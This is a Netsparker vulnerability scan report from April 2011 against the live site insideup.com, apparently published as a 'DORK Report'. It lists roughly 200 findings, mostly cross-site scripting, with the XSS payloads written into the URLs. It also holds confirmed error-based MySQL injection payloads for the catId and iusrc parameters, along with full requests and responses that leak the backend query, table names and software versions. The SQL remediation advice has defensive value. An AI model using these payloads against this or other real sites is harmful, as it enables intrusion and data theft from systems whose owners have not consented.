Netsparker, Web Application Security Scanner

DORK Report, SQL Injection, XSS, insideup.com, CWE-79, CWE-89

Netsparker - Scan Report Summary
TARGET URL: http://www.insideup.com/
SCAN DATE: 4/19/2011 9:15:56 PM
REPORT DATE: 4/20/2011 6:55:18 AM
SCAN DURATION: 00:34:55

Total Requests

Average Speed

req/sec.
202 identified, 174 confirmed, 40 critical, 5 informational

GHDB, DORK Tests

PROFILE: Previous Settings
ENABLED ENGINES: Static Tests, Find Backup Files, Blind Command Injection, Blind SQL Injection, Boolean SQL Injection, Command Injection, HTTP Header Injection, Local File Inclusion, Open Redirection, Remote Code Evaluation, Remote File Inclusion, SQL Injection, Cross-site Scripting
Authentication
Scheduled

VULNERABILITIES

CRITICAL: 20 %
IMPORTANT: 75 %
LOW: 3 %
INFORMATION: 2 %

GHDB, DORK VULNERABILITIES

URL | Parameter | Method | Vulnerability | Confirmed
/ | | | Apache Version Disclosure | No
/communitysignup.html | companyName | POST | Cross-site Scripting | Yes
/communitysignup.html | emailAddress | POST | Cross-site Scripting | Yes
/communitysignup.html | firstName | POST | Cross-site Scripting | Yes
/communitysignup.html | refererUrl | POST | Cross-site Scripting | Yes
/communitysignup.html | lastName | POST | Cross-site Scripting | Yes
/communitysignup.html | password1 | POST | Cross-site Scripting | Yes
/communitysignup.html | password2 | POST | Cross-site Scripting | Yes
/communitysignup.html | pseudonym | POST | Cross-site Scripting | Yes
/communitysignup.html | receiveSpecialOfferEmail | POST | Cross-site Scripting | Yes
/communitysignup.html | refererUrl | POST | Cross-site Scripting | Yes
/communitysignup.html | termsOfService | POST | Cross-site Scripting | Yes
/communitysignup.html | refererUrl | POST | Cross-site Scripting | Yes
/communitysignup.html | pseudonym | POST | Cross-site Scripting | Yes
/communitysignup.html | emailAddress | POST | Cross-site Scripting | Yes
/communitysignup.html | refererUrl | POST | Cross-site Scripting | Yes
/communitysignup.html | firstName | POST | Cross-site Scripting | Yes
/communitysignup.html | pseudonym | POST | Cross-site Scripting | Yes
/communitysignup.html | emailAddress | POST | Cross-site Scripting | Yes
/communitysignup.html | lastName | POST | Cross-site Scripting | Yes
/communitysignup.html | firstName | POST | Cross-site Scripting | Yes
/communitysignup.html | companyName | POST | Cross-site Scripting | Yes
/communitysignup.html | lastName | POST | Cross-site Scripting | Yes
/communitysignup.html | password1 | POST | Cross-site Scripting | Yes
/contactUs.html | comments | POST | Cross-site Scripting | Yes
/contactUs.html | company | POST | Cross-site Scripting | Yes
/contactUs.html | email | POST | Cross-site Scripting | Yes
/contactUs.html | firstName | POST | Cross-site Scripting | Yes
/contactUs.html | lastName | POST | Cross-site Scripting | Yes
/contactUs.html | leadCategory | POST | Cross-site Scripting | Yes
/contactUs.html | phone | POST | Cross-site Scripting | Yes
/contactUs.html | url | POST | Cross-site Scripting | Yes
/contactUs.html | value | POST | Cross-site Scripting | Yes
/contactUs.html | yourInterest | POST | Cross-site Scripting | Yes
/css/ | | | Directory Listing (Apache) | No
/googleMap.html | address | GET | Cross-site Scripting | Yes
/index.html | | | Cookie Not Marked As HttpOnly | Yes
/js/ | | | Forbidden Resource | Yes
/openx/www/ | | | PHP Version Disclosure | No
/ppc/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000542)%3C/script%3E | URI-BASED | Raw URI | Cross-site Scripting | Yes
/ppc/leadflow/ | nsextt | GET | Cross-site Scripting | Yes
/ppc/leadflow/ | Query Based | QUERYSTRING | Cross-site Scripting | Yes
/ppc/leadflow/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000519)%3C/script%3E | URI-BASED | Raw URI | Cross-site Scripting | Yes
/ppc/leadflow/bulo00/ | nsextt | GET | Cross-site Scripting | Yes
/ppc/leadflow/bulo00/ | Query Based | QUERYSTRING | Cross-site Scripting | Yes
/ppc/leadflow/bulo00/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0005C8)%3C/script%3E | URI-BASED | Raw URI | Cross-site Scripting | Yes
/ppc/leadflow/bulo00/project.php | catId | GET | SQL Injection | Yes
/ppc/leadflow/bulo00/project.php | iusrc | GET | SQL Injection | Yes
/ppc/leadflow/bulo00/project.php | catId | GET | [Probable] SQL Injection | No
/ppc/leadflow/bulo00/project.php | iusrc | GET | [Probable] SQL Injection | No
/ppc/leadflow/bulo00/project.php | nsextt | GET | Cross-site Scripting | Yes
/ppc/leadflow/bulo00/project.php | Query Based | QUERYSTRING | Cross-site Scripting | Yes
/ppc/leadflow/bulo00/project.php | catId | GET | Cross-site Scripting | Yes
/ppc/leadflow/bulo00/project.php | iusrc | GET | Cross-site Scripting | Yes
/ppc/leadflow/bulo00/project.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0005CF)%3C/script%3E | URI-BASED | Raw URI | Cross-site Scripting | Yes
/ppc/leadflow/cace00/project.php | iusrc | GET | [Probable] SQL Injection | No
/ppc/leadflow/cace00/project.php | nsextt | GET | Cross-site Scripting | Yes
/ppc/leadflow/cace00/project.php | Query Based | QUERYSTRING | Cross-site Scripting | Yes
/ppc/leadflow/cace00/project.php | catId | GET | Cross-site Scripting | Yes
/ppc/leadflow/cace00/project.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0009C4)%3C/script%3E | URI-BASED | Raw URI | Cross-site Scripting | Yes
/ppc/leadflow/css/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0013B9)%3C/script%3E | URI-BASED | Raw URI | Cross-site Scripting | Yes
/ppc/leadflow/css/Dyn_form_style.css'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0013D1)%3C/script%3E | URI-BASED | Raw URI | Cross-site Scripting | Yes
/ppc/leadflow/css/newlanding_style.css'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0013A8)%3C/script%3E | URI-BASED | Raw URI | Cross-site Scripting | Yes
/ppc/leadflow/css/styles.css'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x001460)%3C/script%3E | URI-BASED | Raw URI | Cross-site Scripting | Yes
/ppc/leadflow/css/ui.core.css'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0013CA)%3C/script%3E | URI-BASED | Raw URI | Cross-site Scripting | Yes
/ppc/leadflow/dima00/ | nsextt | GET | Cross-site Scripting | Yes
/ppc/leadflow/dima00/ | Query Based | QUERYSTRING | Cross-site Scripting | Yes
/ppc/leadflow/dima00/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0005F5)%3C/script%3E | URI-BASED | Raw URI | Cross-site Scripting | Yes
/ppc/leadflow/dima00/project.php | catId | GET | [Probable] SQL Injection | No
/ppc/leadflow/dima00/project.php | nsextt | GET | Cross-site Scripting | Yes
/ppc/leadflow/dima00/project.php | Query Based | QUERYSTRING | Cross-site Scripting | Yes
/ppc/leadflow/dima00/project.php | iusrc | GET | Cross-site Scripting | Yes
/ppc/leadflow/fist00/project.php | iusrc | GET | [Probable] SQL Injection | No
/ppc/leadflow/hins00/project.php | iusrc | GET | [Probable] SQL Injection | No
/ppc/leadflow/images/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x001474)%3C/script%3E | URI-BASED | Raw URI | Cross-site Scripting | Yes
/ppc/leadflow/incn00/project.php | catId | GET | [Probable] SQL Injection | No
/ppc/leadflow/inco00/ | nsextt | GET | Cross-site Scripting | Yes
/ppc/leadflow/inco00/ | Query Based | QUERYSTRING | Cross-site Scripting | Yes
/ppc/leadflow/inco00/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0005BB)%3C/script%3E | URI-BASED | Raw URI | Cross-site Scripting | Yes
/ppc/leadflow/inco00/project.php | catId | GET | SQL Injection | Yes
/ppc/leadflow/inco00/project.php | iusrc | GET | SQL Injection | Yes
/ppc/leadflow/inco00/project.php | catId | GET | [Probable] SQL Injection | No
/ppc/leadflow/inco00/project.php | iusrc | GET | [Probable] SQL Injection | No
/ppc/leadflow/inco00/project.php | nsextt | GET | Cross-site Scripting | Yes
/ppc/leadflow/inco00/project.php | Query Based | QUERYSTRING | Cross-site Scripting | Yes
/ppc/leadflow/inco00/project.php | catId | GET | Cross-site Scripting | Yes
/ppc/leadflow/inco00/project.php | iusrc | GET | Cross-site Scripting | Yes
/ppc/leadflow/inco00/project.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0005C2)%3C/script%3E | URI-BASED | Raw URI | Cross-site Scripting | Yes
/ppc/leadflow/js/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0013ED)%3C/script%3E | URI-BASED | Raw URI | Cross-site Scripting | Yes
/ppc/leadflow/lgds00/ | nsextt | GET | Cross-site Scripting | Yes
/ppc/leadflow/lgds00/ | Query Based | QUERYSTRING | Cross-site Scripting | Yes
/ppc/leadflow/lgds00/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00058D)%3C/script%3E | URI-BASED | Raw URI | Cross-site Scripting | Yes
/ppc/leadflow/lgds00/project.php | catId | GET | SQL Injection | Yes
/ppc/leadflow/lgds00/project.php | iusrc | GET | SQL Injection | Yes
/ppc/leadflow/lgds00/project.php | catId | GET | [Probable] SQL Injection | No
/ppc/leadflow/lgds00/project.php | iusrc | GET | [Probable] SQL Injection | No
/ppc/leadflow/lgds00/project.php | nsextt | GET | Cross-site Scripting | Yes
/ppc/leadflow/lgds00/project.php | Query Based | QUERYSTRING | Cross-site Scripting | Yes
/ppc/leadflow/lgds00/project.php | catId | GET | Cross-site Scripting | Yes
/ppc/leadflow/lgds00/project.php | iusrc | GET | Cross-site Scripting | Yes
/ppc/leadflow/lgds00/project.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0005A7)%3C/script%3E | URI-BASED | Raw URI | Cross-site Scripting | Yes
/ppc/leadflow/lodi00/ | nsextt | GET | Cross-site Scripting | Yes
/ppc/leadflow/lodi00/ | Query Based | QUERYSTRING | Cross-site Scripting | Yes
/ppc/leadflow/lodi00/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0005E9)%3C/script%3E | URI-BASED | Raw URI | Cross-site Scripting | Yes
/ppc/leadflow/lodi00/project.php | catId | GET | SQL Injection | Yes
/ppc/leadflow/lodi00/project.php | catId | GET | [Probable] SQL Injection | No
/ppc/leadflow/lodi00/project.php | nsextt | GET | Cross-site Scripting | Yes
/ppc/leadflow/lodi00/project.php | Query Based | QUERYSTRING | Cross-site Scripting | Yes
/ppc/leadflow/lodi00/project.php | catId | GET | Cross-site Scripting | Yes
/ppc/leadflow/lodi00/project.php | iusrc | GET | Cross-site Scripting | Yes
/ppc/leadflow/lodi00/project.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0005EE)%3C/script%3E | URI-BASED | Raw URI | Cross-site Scripting | Yes
/ppc/leadflow/meac00/ | nsextt | GET | Cross-site Scripting | Yes
/ppc/leadflow/meac00/ | Query Based | QUERYSTRING | Cross-site Scripting | Yes
/ppc/leadflow/meac00/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0005AB)%3C/script%3E | URI-BASED | Raw URI | Cross-site Scripting | Yes
/ppc/leadflow/meac00/project.php | catId | GET | SQL Injection | Yes
/ppc/leadflow/meac00/project.php | iusrc | GET | SQL Injection | Yes
/ppc/leadflow/meac00/project.php | catId | GET | [Probable] SQL Injection | No
/ppc/leadflow/meac00/project.php | iusrc | GET | [Probable] SQL Injection | No
/ppc/leadflow/meac00/project.php | nsextt | GET | Cross-site Scripting | Yes
/ppc/leadflow/meac00/project.php | Query Based | QUERYSTRING | Cross-site Scripting | Yes
/ppc/leadflow/meac00/project.php | catId | GET | Cross-site Scripting | Yes
/ppc/leadflow/meac00/project.php | iusrc | GET | Cross-site Scripting | Yes
/ppc/leadflow/meac00/project.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0005B7)%3C/script%3E | URI-BASED | Raw URI | Cross-site Scripting | Yes
/ppc/leadflow/obtm00/ | nsextt | GET | Cross-site Scripting | Yes
/ppc/leadflow/obtm00/ | Query Based | QUERYSTRING | Cross-site Scripting | Yes
/ppc/leadflow/obtm00/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0005D3)%3C/script%3E | URI-BASED | Raw URI | Cross-site Scripting | Yes
/ppc/leadflow/obtm00/project.php | catId | GET | SQL Injection | Yes
/ppc/leadflow/obtm00/project.php | iusrc | GET | SQL Injection | Yes
/ppc/leadflow/obtm00/project.php | catId | GET | [Probable] SQL Injection | No
/ppc/leadflow/obtm00/project.php | iusrc | GET | [Probable] SQL Injection | No
/ppc/leadflow/obtm00/project.php | nsextt | GET | Cross-site Scripting | Yes
/ppc/leadflow/obtm00/project.php | Query Based | QUERYSTRING | Cross-site Scripting | Yes
/ppc/leadflow/obtm00/project.php | catId | GET | Cross-site Scripting | Yes
/ppc/leadflow/obtm00/project.php | iusrc | GET | Cross-site Scripting | Yes
/ppc/leadflow/obtm00/project.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0005DB)%3C/script%3E | URI-BASED | Raw URI | Cross-site Scripting | Yes
/ppc/leadflow/parl00/ | nsextt | GET | Cross-site Scripting | Yes
/ppc/leadflow/parl00/ | Query Based | QUERYSTRING | Cross-site Scripting | Yes
/ppc/leadflow/parl00/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0005DF)%3C/script%3E | URI-BASED | Raw URI | Cross-site Scripting | Yes
/ppc/leadflow/parl00/project.php | catId | GET | SQL Injection | Yes
/ppc/leadflow/parl00/project.php | iusrc | GET | SQL Injection | Yes
/ppc/leadflow/parl00/project.php | catId | GET | [Probable] SQL Injection | No
/ppc/leadflow/parl00/project.php | iusrc | GET | [Probable] SQL Injection | No
/ppc/leadflow/parl00/project.php | nsextt | GET | Cross-site Scripting | Yes
/ppc/leadflow/parl00/project.php | Query Based | QUERYSTRING | Cross-site Scripting | Yes
/ppc/leadflow/parl00/project.php | catId | GET | Cross-site Scripting | Yes
/ppc/leadflow/parl00/project.php | iusrc | GET | Cross-site Scripting | Yes
/ppc/leadflow/parl00/project.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0005E7)%3C/script%3E | URI-BASED | Raw URI | Cross-site Scripting | Yes
/ppc/leadflow/phsy00/ | nsextt | GET | Cross-site Scripting | Yes
/ppc/leadflow/phsy00/ | Query Based | QUERYSTRING | Cross-site Scripting | Yes
/ppc/leadflow/phsy00/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00055F)%3C/script%3E | URI-BASED | Raw URI | Cross-site Scripting | Yes
/ppc/leadflow/phsy00/project.php | catId | GET | SQL Injection | Yes
/ppc/leadflow/phsy00/project.php | iusrc | GET | SQL Injection | Yes
/ppc/leadflow/phsy00/project.php | catId | GET | [Probable] SQL Injection | No
/ppc/leadflow/phsy00/project.php | iusrc | GET | [Probable] SQL Injection | No
/ppc/leadflow/phsy00/project.php | nsextt | GET | Cross-site Scripting | Yes
/ppc/leadflow/phsy00/project.php | Query Based | QUERYSTRING | Cross-site Scripting | Yes
/ppc/leadflow/phsy00/project.php | catId | GET | Cross-site Scripting | Yes
/ppc/leadflow/phsy00/project.php | iusrc | GET | Cross-site Scripting | Yes
/ppc/leadflow/phsy00/project.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00058B)%3C/script%3E | URI-BASED | Raw URI | Cross-site Scripting | Yes
/ppc/leadflow/project_dynamic_page_updated.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x001435)%3C/script%3E | URI-BASED | Raw URI | Cross-site Scripting | Yes
/ppc/leadflow/style/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0013BD)%3C/script%3E | URI-BASED | Raw URI | Cross-site Scripting | Yes
/ppc/leadflow/style/dhtmlwindow.css'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0013B5)%3C/script%3E | URI-BASED | Raw URI | Cross-site Scripting | Yes
/ppc/leadflow/wede00/ | nsextt | GET | Cross-site Scripting | Yes
/ppc/leadflow/wede00/ | Query Based | QUERYSTRING | Cross-site Scripting | Yes
/ppc/leadflow/wede00/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00050F)%3C/script%3E | URI-BASED | Raw URI | Cross-site Scripting | Yes
/ppc/leadflow/wede00/project.php | catId | GET | SQL Injection | Yes
/ppc/leadflow/wede00/project.php | iusrc | GET | SQL Injection | Yes
/ppc/leadflow/wede00/project.php | catId | GET | [Probable] SQL Injection | No
/ppc/leadflow/wede00/project.php | iusrc | GET | [Probable] SQL Injection | No
/ppc/leadflow/wede00/project.php | nsextt | GET | Cross-site Scripting | Yes
/ppc/leadflow/wede00/project.php | Query Based | QUERYSTRING | Cross-site Scripting | Yes
/ppc/leadflow/wede00/project.php | catId | GET | Cross-site Scripting | Yes
/ppc/leadflow/wede00/project.php | iusrc | GET | Cross-site Scripting | Yes
/ppc/leadflow/wede00/project.php | catId | GET | Database Error Message | No
/ppc/leadflow/wede00/project.php | | | MySQL Database Identified | Yes
/ppc/leadflow/wede00/project.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00055D)%3C/script%3E | URI-BASED | Raw URI | Cross-site Scripting | Yes
/ppc/leadflow/weho00/project.php | iusrc | GET | [Probable] SQL Injection | No
/ppc/tools/ | | | Redirect Response BODY Is Too Large | Yes
/privacy.html | | | E-mail Address Disclosure | No
/selectvendors.html | | | Password Transmitted Over HTTP | Yes
/selectvendors.html | | | Auto Complete Enabled | Yes
/updateCity.html | city | GET | Cross-site Scripting | Yes
/whitePapaper.html | company | POST | Cross-site Scripting | Yes
/whitePapaper.html | companyServices | POST | Cross-site Scripting | Yes
/whitePapaper.html | email | POST | Cross-site Scripting | Yes
/whitePapaper.html | firstName | POST | Cross-site Scripting | Yes
/whitePapaper.html | iusrc | POST | Cross-site Scripting | Yes
/whitePapaper.html | lastName | POST | Cross-site Scripting | Yes
/whitePapaper.html | parentPage | POST | Cross-site Scripting | Yes
/whitePapaper.html | phone | POST | Cross-site Scripting | Yes
/whitePapaper.html | src | POST | Cross-site Scripting | Yes
/whitePapaper.html | url | POST | Cross-site Scripting | Yes
/whitePapaper.html | company | POST | Cross-site Scripting | Yes
/whitePapaper.html | companyServices | POST | Cross-site Scripting | Yes
/whitePapaper.html | email | POST | Cross-site Scripting | Yes
/whitePapaper.html | firstName | POST | Cross-site Scripting | Yes
/whitePapaper.html | lastName | POST | Cross-site Scripting | Yes
/whitePapaper.html | parentPage | POST | Cross-site Scripting | Yes
/whitePapaper.html | phone | POST | Cross-site Scripting | Yes
/whitePapaper.html | src | POST | Cross-site Scripting | Yes
/whitePapaper.html | url | POST | Cross-site Scripting | Yes
/whitePapaper.html | | | Internal Server Error | Yes
SQL Injection

TOTAL: 17
SEVERITY: CRITICAL
CONFIRMED: 17
SQL Injection occurs when input data, for example data supplied by a user, is interpreted by the backend database as part of a SQL command rather than as normal data. This is an extremely common vulnerability and its successful exploitation can have critical implications. Netsparker confirmed the vulnerability by executing a test SQL query on the back-end database.

Impact

Depending on the backend database, the database connection settings and the operating system, an attacker can successfully mount one or more of the following types of attack:
  • Reading, Updating and Deleting arbitrary data from the database
  • Executing commands on the underlying operating system
  • Reading, Updating and Deleting arbitrary tables from the database

Actions to Take

  1. See the remedy for the solution.
  2. If you are not using a database access layer (DAL), consider using one. This will help you centralise the fix. You can also use an ORM (object relational mapping). Most ORM systems use only parameterised queries, which can solve the whole SQL Injection problem.
  3. Locate all of the dynamically generated SQL queries and convert them to parameterised queries (if you decide to use a DAL/ORM, change all legacy code to use these new libraries).
  4. Use your web server logs and application logs to see whether there was any previous but undetected attack against this resource.

Remedy

A robust method for mitigating the threat of SQL Injection based vulnerabilities is to use parameterised queries (prepared statements). Almost all modern languages provide built-in libraries for this. Wherever possible, do not create dynamic SQL queries or SQL queries with string concatenation.

Required Skills for Successful Exploitation

There are numerous freely available tools to exploit SQL Injection vulnerabilities. This is a complex area with many dependencies; however, it should be noted that the numerous resources available in this area have raised both attacker awareness of the issues and their ability to discover and leverage them. SQL Injection is one of the most common web application vulnerabilities.

External References

Remedy References

- /ppc/leadflow/wede00/project.php

/ppc/leadflow/wede00/project.php CONFIRMED

http://www.insideup.com/ppc/leadflow/wede00/project.php?catId='%2B(select+1+and+row(1%2c1)%3e(select..

Parameters

Parameter | Type | Value
catId | GET | '+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'
iusrc | GET | iupsc

Extracted Data

5.0.45

Request

GET /ppc/leadflow/wede00/project.php?catId='%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B'&iusrc=iupsc HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:23:03 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=3jpuhm6d0i03rre8doid216i86; path=/
Content-Length: 4868
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/wede00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/wede00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/wede00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/wede00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from 
lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/wede00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/wede00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/wede00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/wede00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on 
cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/wede00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/wede00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc/'Duplicate entry '_!@4dilemma:1' for key 1
- /ppc/leadflow/wede00/project.php

/ppc/leadflow/wede00/project.php CONFIRMED

http://www.insideup.com/ppc/leadflow/wede00/project.php?catId=20001&iusrc='%2B(select+1+and+row(1%2c..

Parameters

Parameter | Type | Value
catId | GET | 20001
iusrc | GET | '+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'

Extracted Data

5.0.45

Request

GET /ppc/leadflow/wede00/project.php?catId=20001&iusrc='%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B' HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:23:44 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=hg8g6kep5lprpe7rest98lu0c4; path=/
Content-Length: 4868
Connection: close
Content-Type: text/html; charset=UTF-8


